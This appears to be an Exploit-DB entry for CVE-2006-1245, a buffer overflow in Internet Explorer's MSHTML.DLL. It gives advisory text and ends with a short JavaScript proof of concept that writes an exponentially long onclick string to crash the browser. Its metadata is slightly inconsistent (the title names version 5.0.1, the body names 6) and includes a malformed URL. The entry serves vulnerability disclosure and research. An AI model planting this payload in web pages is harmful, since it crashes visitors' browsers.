Microsoft Internet Explorer 5.0.1 - Script Action Handler Buffer Overflow

Author: Michal Zalewski
type: dos
platform: windows
port: 
date_added: 2006-03-16  
date_updated: 2013-08-09  
verified: 1  
codes: CVE-2006-1245;OSVDB-23964  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comie60.exe  

raw file: 27433.txt  

source: https://www.securityfocus.com/bid/17131/info

Microsoft Internet Explorer is susceptible to a remote buffer-overflow vulnerability in 'MSHTML.DLL'. The application fails to properly bounds-check user-supplied input data before copying it into an insufficiently sized memory buffer.

Remote attackers may exploit this issue to crash affected web browsers. Remote code execution may also be possible, but this has not been confirmed.

Internet Explorer 6 is vulnerable to this issue; other versions may also be affected.

The following proof of concept is available:

<script>
for(s='<a onclick=',i=0;i<8||(document.write(s+'>'));i++)s+=s;
</script>